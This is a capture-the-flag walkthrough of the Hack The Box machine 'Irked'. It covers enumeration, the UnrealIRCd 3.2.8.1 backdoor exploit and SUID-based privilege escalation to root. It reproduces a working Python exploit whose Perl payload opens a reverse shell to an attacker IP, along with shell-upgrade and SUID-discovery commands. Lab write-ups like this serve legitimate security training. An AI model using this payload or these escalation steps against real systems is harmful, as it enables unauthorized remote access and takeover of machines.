CTF Walkthroughs, Hack The Box

Hack The Box – Irked Walkthrough

January 27, 2021 | by Stefano Lanaro | Leave a comment

Introduction

This was an easy Linux box that involved exploiting a vulnerability that allowed to remotely download and execute files to gain initial access, using Steganography to escalate to the mardov user and exploiting a custom SUID binary to gain root access.

Enumeration

The first thing to do is to run a TCP Nmap scan against the 1000 most common ports, and using the following flags:

  • -sC to run default scripts
  • -sV to enumerate applications versions

When running a scan using the -p- flag to scan all ports, port 8067 is found:

Enumerating Port HTTP

The webserver’s home page shows the below and after running a few scans to find hidden files and directories nothing useful was found:

Enumerating IRC

IRC is a layer protocol that used to create chat clients/servers. This box uses UnrealIRC for this service. When searching for public exploits with SerachSploit, a few come up:

The above did not seem to work, so after some research, this GitHub repository had a useful script to exploit this vulnerability:

Exploiting in UnrealIRC 3.2.8.1

After cloning the repository, updating local and remote IP address/port

import socket

#target ip and port
ip="10.10.10.117"
port=8067
##################
print ("MADE BY :- SARTHAK")
print("			Referenced by:- Metasploit source code")

print("NOTE:-I MADE THIS DUE TO PEOPLE PREPARING FOR OSCP WANT TO DO EXPLOITATION MANUALLY AS WELL AS THE EXPLOIT-DB EXPLOIT DOESN'T SEEM TO BE WORKING IDK WHY :(\n")
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

s.connect((ip,port))

a=s.recv(1024)

print "Sending payload baby :)"

#replace the ip and port with yours ...(YOUR IP AND PORT)
a="AB;perl -MIO -e '$p=fork;exit,if($p);foreach my $key(keys %ENV){if($ENV{$key}=~/(.*)/){$ENV{$key}=$1;}}$c=new IO::Socket::INET(PeerAddr,\"10.10.14.8:443\");STDIN->fdopen($c,r);$~->fdopen($c,w);while(<>){if($_=~ /(.*)/){system $1;}};'"

s.sendall(a)
print("Eyes on netcat sire 10...9...8...7...6...5..4..3...2..1..HAHA IT WILL COME :)")

The next step is to set up a Netcat listener, which will catch our reverse shell when it is executed by the victim host, using the following flags:

  • -l to listen for incoming connections
  • -v for verbose output
  • -n to skip the DNS lookup
  • -p to specify the port to listen on

After running the script, a callback granting a reverse shell is received:

The following steps can be done to obtain an interactive shell:

  • Running “python -c ‘import pty; pty.spawn(“/bin/sh”)’” on the victim host
  • Hitting CTRL+Z to background the process and go back to our host
  • Running “stty raw -echo” on our host
  • Hitting “fg + ENTER” to go back to our reverse shell

Privilege Escalation

When inspecting the irc user’s bash history, the Documents folder in the djmardov user’s home directory is mentioned.

When navigating to the documents folder, a file is found in a hidden folder containing what seems to be a password to be used in steganography:

Downloading the image used in the home page of the web server:

Steghide is a steganography program that can hide data in image files. Using steghide to extract information from the image with the password found:

A pass.txt file was extracted. Using the password to login through SSH:

Listing available SUID binary/commands with the following:

find / -perm -u=s -type f 2>/dev/null; find / -perm -4000 -o- -perm -2000 -o- -perm -6000

When running the /usrbin/viewuser binary, it looks like it is trying to execute a listuser file but it cannot find it

Creating a listuser script that prints user name and id to verify execution.

Executing viewusers – it has been executed as root based on the output below

Modifying the script to create a suid binary of bash

Executing the script and verifying it has created the binary, it is owned by root and it has SUID permission

After executing the new SUID bash binary with the -p flag, which allows to execute binaries as the owner of it, this grants root access to the host:

Conclusion

This was a very interesting box, even though the SUID privilege escalation part was pretty ordinary, IRC isn’t a service that is seen very often lately and the steganography aspect of it was really unique.